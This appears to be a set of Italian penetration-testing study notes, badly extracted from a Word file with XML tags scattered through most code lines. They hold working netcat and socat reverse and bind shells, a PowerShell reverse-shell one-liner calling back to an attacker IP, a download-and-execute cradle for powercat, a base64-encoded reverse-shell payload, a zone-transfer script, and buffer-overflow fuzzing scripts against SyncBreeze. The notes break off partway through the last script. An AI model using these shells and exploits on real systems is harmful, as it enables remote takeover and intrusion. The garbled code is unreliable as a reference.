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-----&gt;Reverse shell scenario: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C:\Users\offsec&gt; nc -nlvp 4444 -e  reverseshellbellissima.exe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root@kali# nc -nv 192.168.10.5 4444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oppure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root@kali# nc -nv 192.168.10.5 4444 -e /bin/bash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C:\Users\offsec&gt; nc -nlvp 4444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----------&gt;Reverse shell criptata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C:\Users\offsec&gt; socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create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C:\Users\offsec&gt; type received_secret_passwords.txt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sono troppo forte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C:\Users\offsec&gt; socat -d -d TCP4-LISTEN:443 STDOUT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kali@kali: openssl req -newkey</w:t>
        <w:tab/>
        <w:t xml:space="preserve">rsa:2048</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-nodes</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-keyout</w:t>
        <w:tab/>
        <w:t xml:space="preserve">bind_shell.key</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-x509</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-days</w:t>
        <w:tab/>
        <w:t xml:space="preserve">36</w:t>
        <w:tab/>
        <w:t xml:space="preserve">2</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-out</w:t>
        <w:tab/>
        <w:t xml:space="preserve">bind_shell.crt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*compilare campi*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kali@kali:cat bind_shell.key bind_shell.crt &gt; bind_shell.pem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kali@kali sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork</w:t>
        <w:tab/>
        <w:t xml:space="preserve">EXEC:/bin /bash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Powershell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\\togliere permessi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PS C:\Windows\system32&gt; Set-ExecutionPolicy Unrestricted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--&gt; y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PS C:\Windows\system32&gt; Get-ExecutionPolicy Unrestricted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C:\Users\offsec&gt;powershell -c "(new-object</w:t>
        <w:tab/>
        <w:t xml:space="preserve">System.Net.WebClient).DownloadFile('http:/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/10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"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C:\Users\offsec&gt;wget.exe -V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//eseguire una reverse shell attraverso powershell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kali@kali sudo nc -lnvp 443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--script powershell della reverse shell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$client</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">New-Object</w:t>
        <w:tab/>
        <w:t xml:space="preserve">System.Net.Sockets.TCPClient('10.11.0.4',443);</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$stream</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$client.GetStream();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[byte[]]$bytes</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0..65535|%{0};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while(($i</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$stream.Read($bytes,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$bytes.Length))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-ne</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0)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$data</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(New-Object</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-TypeName</w:t>
        <w:tab/>
        <w:t xml:space="preserve">System.Text.ASCIIEncoding).GetString($bytes,0,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$i);</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$sendback</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(iex</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$data</w:t>
        <w:tab/>
        <w:t xml:space="preserve">2&gt;&amp;1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Out-String</w:t>
        <w:tab/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$sendback2</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$sendback</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'PS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(pwd).Path</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">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$sendbyte</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">([text.encoding]::ASCII).GetBytes($sendback2);</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$stream.Write($sendbyte,0,$sendbyte.Length);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$stream.Flush();</w:t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  <w:tab/>
        <w:t xml:space="preserve">$client.Close();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//bind shell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C:\Users\offsec&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">powershell</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-c</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"$client</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">New-Object</w:t>
        <w:tab/>
        <w:t xml:space="preserve">System.Net.Sockets.TCPClient('10.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">11.0.4',443);$stream</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=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$client.GetStream();[byte[]]$bytes</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0..65535|%{0};while(($i</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$stream.Read($bytes,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$bytes.Length))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-ne</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0){;$data</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=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(New-Object</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-TypeName</w:t>
        <w:tab/>
        <w:t xml:space="preserve">System.T</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ext.ASCIIEncoding).GetString($bytes,0,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$i);$sendback</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(iex</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$data</w:t>
        <w:tab/>
        <w:t xml:space="preserve">2&gt;&amp;1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Out-String</w:t>
        <w:tab/>
        <w:t xml:space="preserve">);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$sendback2</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$sendback</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'PS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(pwd).Path</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">';$sendbyte</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">([text.encoding]::ASCII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).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lient.Close()"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kali@kali:sudo nc -lnvp 443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C:\Users\offsec&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">powershell</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-c</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"$listener</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">New-Object</w:t>
        <w:tab/>
        <w:t xml:space="preserve">System.Net.Sockets.TcpListener(</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'0.0.0.0',443);$listener.start();$client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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$listener.AcceptTcpClient();$stream</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$clie</w:t>
        <w:tab/>
        <w:t xml:space="preserve">nt.GetStream();[byte[]]$bytes</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0..65535|%{0};while(($i</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=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$stream.Read($bytes,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$byt</w:t>
        <w:tab/>
        <w:t xml:space="preserve">es.Length))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-ne</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0){;$data</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(New-Object</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-TypeName</w:t>
        <w:tab/>
        <w:t xml:space="preserve">System.Text.ASCIIEncoding).GetString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($bytes,0,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$i);$sendback</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(iex</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$data</w:t>
        <w:tab/>
        <w:t xml:space="preserve">2&gt;&amp;1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Out-String</w:t>
        <w:tab/>
        <w:t xml:space="preserve">);$sendback2</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$sendback</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'P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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(pwd).Path</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">';$sendbyte</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">([text.encoding]::ASCII).GetBytes($sendback2);$str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eam.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Sto</w:t>
        <w:tab/>
        <w:t xml:space="preserve">p()"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nc -nv 10.11.0.22 443 open ipconfig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//Powercat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sarebbe powershell ma la versione di netcat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apt install powercat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--&gt; il file sarà su /usr/share/windows-resources/powercat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PS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C:\Users\Offsec&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">iex</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(New-Object</w:t>
        <w:tab/>
        <w:t xml:space="preserve">System.Net.Webclient).DownloadString('https://raw.</w:t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githubusercontent.com/besimorhino/powercat/master/powercat.ps1')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//ovviamente il file powercat.ps1 deve essere un file powershell vuoto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PS C:\Users\offsec&gt; powercat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//-c (client mode) -l (listen mode)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--mandare file con powercat e avviare una reverse shell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PS C:\Users\Offsec&gt; powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1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PS C:\Users\Offsec&gt; powercat -c 10.11.0.4 -p 443 -e cmd.exe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kali@kali $: sudo nc -lnvp 443 &gt; receiving_powercat.ps1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*ctrl c*^C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kali#kali$: ls receiving_powercat.ps1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sudo nc -lvp 443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---&gt;settare un payload attraverso powercat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kali@kali nc 10.11.0.22 443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PS C:\Users\offsec&gt; powercat -c 10.11.0.4 -p 443 -e cmd.exe -g &gt; reverseshell.ps1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PS C:\Users\offsec&gt; ./reverseshell.ps1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PS C:\Users\offsec&gt; powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge &gt; encodedreverseshell.ps1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PS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C:\Users\offsec&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">powershell.exe</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-E</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFM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AZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAHIAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzA</w:t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CkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAsACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQB</w:t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yAHMACgAgACAAIAAgAGkAZgAoACQAZwBsAG8AYgBhAGwAOgBWAGUAcgBiAG8AcwBlACkAewAkAFYAZQByAGIAb</w:t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wBzAGUAIAA9ACAAJABUAHIAdQBlAH0ACgAgACAAIAAgACQARgB1AG4AYwBWAGEAcgBzACAAPQAgAEAAewB9AAo</w:t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AIAAgACAAIABpAGYAKAAhACQAbAApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAJABGAHUAbgBjAFYAYQByA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HMAWwAiAGwAIgBdACAAPQAgACQARgBhAGwAcwBlAAoAIAAgACAAIAAgACAAJABTAG8AYwBrAGUAdAAgAD0AIAB</w:t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OAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAc</w:t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ABDAGwAaQBlAG4AdAAKACAAIAAgACA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//il payload lo si può generare anche con un msfvenom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kali@kali $: sudo nc -lnvp 443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Zone Transfer Bash Script (per il DNS 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#!/bin/bash</w:t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#Simple</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Zone Transfer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Bash</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Script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#$1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">is</w:t>
        <w:tab/>
        <w:t xml:space="preserve">the</w:t>
        <w:tab/>
        <w:t xml:space="preserve">first</w:t>
        <w:tab/>
        <w:t xml:space="preserve">argument</w:t>
        <w:tab/>
        <w:t xml:space="preserve">given</w:t>
        <w:tab/>
        <w:t xml:space="preserve">after</w:t>
        <w:tab/>
        <w:t xml:space="preserve">the</w:t>
        <w:tab/>
        <w:t xml:space="preserve">bash</w:t>
        <w:tab/>
        <w:t xml:space="preserve">script</w:t>
        <w:tab/>
        <w:t xml:space="preserve">#</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Check</w:t>
        <w:tab/>
        <w:t xml:space="preserve">if</w:t>
        <w:tab/>
        <w:t xml:space="preserve">argument</w:t>
        <w:tab/>
        <w:t xml:space="preserve">was</w:t>
        <w:tab/>
        <w:t xml:space="preserve">given,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">if</w:t>
        <w:tab/>
        <w:t xml:space="preserve">not,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">print</w:t>
        <w:tab/>
        <w:t xml:space="preserve">usage</w:t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if</w:t>
        <w:tab/>
        <w:t xml:space="preserve">[</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"$1"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">];</w:t>
        <w:tab/>
        <w:t xml:space="preserve">then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echo</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"[*]</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Simple</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Zone</w:t>
        <w:tab/>
        <w:t xml:space="preserve">transfer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">script"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">echo</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"[*]</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Usage</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$0</w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;domain</w:t>
        <w:tab/>
        <w:t xml:space="preserve">name&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">exit</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0</w:t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fi</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">if</w:t>
        <w:tab/>
        <w:t xml:space="preserve">argument</w:t>
        <w:tab/>
        <w:t xml:space="preserve">was</w:t>
        <w:tab/>
        <w:t xml:space="preserve">given,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">identify</w:t>
        <w:tab/>
        <w:t xml:space="preserve">the</w:t>
        <w:tab/>
        <w:t xml:space="preserve">DNS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">servers</w:t>
        <w:tab/>
        <w:t xml:space="preserve">for</w:t>
        <w:tab/>
        <w:t xml:space="preserve">the</w:t>
        <w:tab/>
        <w:t xml:space="preserve">domain</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">server</w:t>
        <w:tab/>
        <w:t xml:space="preserve">in</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$(host</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-t</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ns</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">cut</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-d</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-f4);</w:t>
        <w:tab/>
        <w:t xml:space="preserve">do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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">For</w:t>
        <w:tab/>
        <w:t xml:space="preserve">each</w:t>
        <w:tab/>
        <w:t xml:space="preserve">of</w:t>
        <w:tab/>
        <w:t xml:space="preserve">these</w:t>
        <w:tab/>
        <w:t xml:space="preserve">servers,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">attempt</w:t>
        <w:tab/>
        <w:t xml:space="preserve">a</w:t>
        <w:tab/>
        <w:t xml:space="preserve">zone</w:t>
        <w:tab/>
        <w:t xml:space="preserve">transfer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">host</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-l</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$server</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|grep</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"has</w:t>
        <w:tab/>
        <w:t xml:space="preserve">address"</w:t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done</w:t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chmod+x dns-axfr.sh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./dns-axfr.sh google.com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script python per il fuzzing/ buffer overflow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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t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"\nSending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t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size</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">100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inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">size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content</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"username="</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"&amp;password=A"</w:t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=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"POST</w:t>
        <w:tab/>
        <w:t xml:space="preserve">/login</w:t>
        <w:tab/>
        <w:t xml:space="preserve">HTTP/1.1\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Host:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10.11.0.22\r\n"</w:t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fox/52.0\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t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\r\n"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buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t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"User-Agent:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mozilla/5.0</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(X11;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Linux_86_64;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">rv:52.0)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Gecko/20100101</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Fire</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Accept:</w:t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text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t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"Accept-Language:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">en-US,en;q=0.5\r\n"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"Referer:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">http://10.11.0.22/login\r\n"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"Connection:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">close\r\n"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"Content-Type:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">application/x-www-form-urlencoded\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Content-Length:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"+str(len(content))+"\r\n"</w:t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"\r\n"</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.socket(socket.AF_INET,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.SOCK_STREAM)</w:t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s.connect(("10.11.0.22",</w:t>
        <w:tab/>
        <w:t xml:space="preserve">80))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s.send(buffer)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s.close()</w:t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"\nDone!"</w:t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"Could</w:t>
        <w:tab/>
        <w:t xml:space="preserve">not</w:t>
        <w:tab/>
        <w:t xml:space="preserve">connect!"</w:t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content</w:t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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">time</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">sys</w:t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size</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">100</w:t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while(size</w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">2000):</w:t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"\nSending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">with</w:t>
        <w:tab/>
        <w:t xml:space="preserve">%s</w:t>
        <w:tab/>
        <w:t xml:space="preserve">bytes"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">%</w:t>
        <w:tab/>
        <w:t xml:space="preserve">size</w:t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inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">size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content</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"username="</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"&amp;password=A"</w:t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=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"POST</w:t>
        <w:tab/>
        <w:t xml:space="preserve">/login</w:t>
        <w:tab/>
        <w:t xml:space="preserve">HTTP/1.1\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Host:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10.11.0.22\r\n"</w:t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fox/52.0\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t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\r\n"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buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=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"User-Agent:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mozilla/5.0</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(X11;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Linux_86_64;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">rv:52.0)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Gecko/20100101</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Fire</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Accept:</w:t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text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t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"Accept-Language:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">en-US,en;q=0.5\r\n"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"Referer:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">http://10.11.0.22/login\r\n"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"Connection:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">close\r\n"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"Content-Type:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">application/x-www-form-urlencoded\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Content-Length:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"+str(len(content))+"\r\n"</w:t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"\r\n"</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.socket</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(socket.AF_INET,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.SOCK_STREAM)</w:t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s.connect(("10.11.0.22",</w:t>
        <w:tab/>
        <w:t xml:space="preserve">80))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s.send(buffer)</w:t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s.close()</w:t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size</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">100</w:t>
        <w:tab/>
        <w:t xml:space="preserve">time.sleep(10)</w:t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"\nCould</w:t>
        <w:tab/>
        <w:t xml:space="preserve">not</w:t>
        <w:tab/>
        <w:t xml:space="preserve">connect!"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">sys.exit()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//script python per il buffer overflow su SyncBreeze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#!/usr/bin/python</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t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"\nSending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t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size</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">800</w:t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inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">size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content</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"username="</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"&amp;password=A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"POST</w:t>
        <w:tab/>
        <w:t xml:space="preserve">/login</w:t>
        <w:tab/>
